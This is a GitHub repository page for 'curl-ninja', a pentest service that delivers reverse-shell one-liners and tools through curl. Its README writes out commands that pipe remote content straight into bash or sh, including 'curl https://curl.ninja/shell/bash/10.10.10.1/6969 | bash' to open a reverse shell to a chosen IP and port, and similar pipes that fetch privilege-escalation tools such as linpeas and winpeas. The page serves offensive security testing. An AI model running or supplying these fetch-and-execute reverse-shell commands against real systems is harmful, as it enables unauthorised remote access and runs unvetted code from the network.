Skip to content

Hack-Church/curl-ninja

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

10 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Curl.Ninja

Shellcode and tools always a curl away.

Shellcode 🐚

Generate and run shellcode one-liners:

curl https://curl.ninja/shell/LANGUAGE/IP/PORT | bash

Example

curl https://curl.ninja/shell/bash/10.10.10.1/6969 | bash

Language Support

Thanks to pentestmonkey for the language support:

  • Bash via /bash/
  • Java via /java/
  • Netcat via /nc/
  • PERL via /perl/
  • PHP via /php/
  • Python via /python/
  • Ruby via /ruby/

Tools 🛠

Easily download tools from GitHub:

curl https://curl.ninja/TOOLNAME | sh | sh
curl https://curl.ninja/TOOLNAME | sh > FILENAME

Examples

curl https://curl.ninja/linpeas | sh | sh
curl https://curl.ninja/winpeas | sh > wp.exe

Available Tools

If you notice any of your favorite open source tools are missing or your CLI tool of choice is returing html, open an issue

About

curl access to tools and shells

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published